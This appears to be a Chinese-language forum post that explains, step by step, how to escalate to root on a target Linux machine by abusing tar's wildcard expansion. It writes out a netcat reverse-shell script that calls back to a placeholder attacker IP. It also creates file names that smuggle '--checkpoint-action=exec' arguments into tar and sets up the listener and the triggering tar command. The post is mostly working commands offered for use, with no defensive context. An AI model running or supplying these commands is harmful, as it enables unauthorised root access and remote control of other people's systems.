基于tar通配符漏洞的提权方法

打印 上一主题 下一主题

主题 891|帖子 891|积分 2673

以普通用户进入目标机后,若是可以运行tar指令,则可以通过以下的方法进行提权
原理:
tar有通配符*的漏洞,tar用通配符来压缩文件并读取文件名,若是看到有参数则将执行。
 
操作:
1.先cd到一个用户有完全执行命令的文件夹下
例如:www-data用户的完全权限文件夹为/var/www/html
 
2.创建一个reverse shell脚本
  1. echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc you_ip 1234 >/tmp/f' > shell.sh<br><br>you_ip为本机IP地址<br>1234为将要监听的端口
复制代码
 
3.创建tar将要运行的参数
  1. touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
  2. touch "/var/www/html/--checkpoint=1"<br>
复制代码
 
4.在本机上打开本地监听
  1. nc -lnvp 1234
复制代码
 
5.在目标机上执行命令
  1. tar cf /var/www/html.tgz *<br><br>c代表创建<br>f代表类型为文件<br>最后的通配符*是精华所在<br>这整个命令意思就是:<br>因为之前已经cd到/var/www/html目录下了,<br>然后就直接将这整个目录下的所有文件进行压缩,<br>如果遇到参数则执行,压缩后创建一个文件,创建的文件目录可以随便定个可以写入的目录
复制代码
最后在本地机上就已经以root登入了

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

河曲智叟

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表